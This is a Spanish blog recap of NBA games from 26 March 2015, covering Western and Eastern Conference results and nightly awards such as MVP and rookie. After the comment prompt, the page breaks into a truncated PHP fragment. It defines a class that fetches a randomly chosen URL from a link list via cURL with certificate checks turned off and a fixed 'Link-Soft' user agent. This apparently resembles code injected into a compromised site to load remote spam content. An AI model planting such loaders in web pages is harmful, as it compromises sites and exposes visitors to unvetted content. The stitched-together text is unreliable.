La Crónica: los Cavs asustan

26 de March de 2015 por MagicJohnson32

Hoy las circunstancias nos obligan a una crónica exprés, el mínimo exigible para seguir el hilo de este tramo final de regular season con tantos frentes abiertos y al que los Cavs llegan en aparente plenitud según lo demostrado anoche en Memphis.

Empecemos por el Oeste, donde los Suns desaprovecharon una gran ocasión para recortar distancias respecto a los Thunder. Los Kings, que en manos de George Karl van mejorando, ganaron en Phoenix (108-99), con lo que quedó sin valor la sonrojante derrota de los Thunder en San Antonio (91-130). También perdieron los Pelicans, en su caso ante los Rockets (95-93) en el regreso de Dwight Howard, por lo que todo sigue igual en la carrera por hacerse con la octava posición del Oeste. Por arriba, los Blazers lograron una meritoria victoria en Utah (92-89), donde tuvieron que remontar en los últimos minutos y resultó fundamental el retorno de LaMarcus. También vencieron los Clippers, que se pasearon en el Madison (111-80). No pueden decir lo mismo los Grizzlies, superados claramente por unos Cavs que empiezan a intimidar (111-89) y en los que el Big Three ejerció como tal.

En el Este hubo dos duelos directos entre equipos que luchan por un puesto de Playoffs. Los Nets ganaron en Charlotte (91-88) liderados por Brook Lopez, y los Heat hicieron lo propio en Boston (93-86) pese a las bajas de Wade y Whiteside. Además, George Hill mantuvo su nivel All Star para cerrar la racha negativa de los Pacers y vencer en Washington (103-101). De esta manera, los Celtics mantienen el octavo puesto pero empatados con los Pacers y medio partido de ventaja sobre Nets y Hornets. En la zona alta del Este, los Raptors siguen de pájara y un último cuarto calamitoso les condenó ante los Bulls (116-103). También los Hawks necesitaron apretar al final pero acabaron imponiéndose en ORlando (95-83).

Y por último descendemos a los infiernos para explicar que los Lakers de Clarkson (a esto hemos llegado) superaron en la prórroga a los Wolves (101-99) y los Sixers ganaron en Denver (99-85) en otra gran actuación de Noel.

PREMIOS

MVP: Parece empeñado Brook Lopez en que los Nets jueguen los Playoffs este año. 34 puntos, 16 de 26 en tiros, 10 rebotes, 3 tapones y 2 recuperaciones aportó para que su equipo saliese ganador de Time Warner Cable Arena.

Rookie: ¿Los 14 puntos, 15 rebotes, 4 tapones, 4 robos y 2 asistencias de Noel o los 27 puntos, 6 rebotes, 4 asistencias, 2 robos y 2 tapones de Wiggins? A vuestra elección.

Sorpresa: Regresó Dwight Howard y James Harden hizo su parte, pero para entender la victoria de los Rockets en New Orleans hay que ver las actuaciones de Motiejunas (21 puntos, 10 de 16 en tiros, 8 rebotes, 2 robos y 1 asistencia) y Trevor Ariza (22 puntos, 9 rebotes, 5 asistencias y 3 robos).

Decepción: Vaya retorno de Isaiah Thomas. 4 puntos, con 2 de 7 en tiros de campo y 0 de 3 en tiros libres, sin rebotes, ni asistencias, ni recuperaciones ni tapones y la guinda de 3 pérdidas cometidas. A los Celtics les habría ido mejor sin él.

Mayor esfuerzo en vano: George Hill arruinó la gran actuación de John Wall, que sumó 34 puntos, 4 rebotes, 6 asistencias, 2 robos y 1 tapón pero no lo pudo celebrar con victoria.

Top 10

Imágenes | AP Photos / Getty Images

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>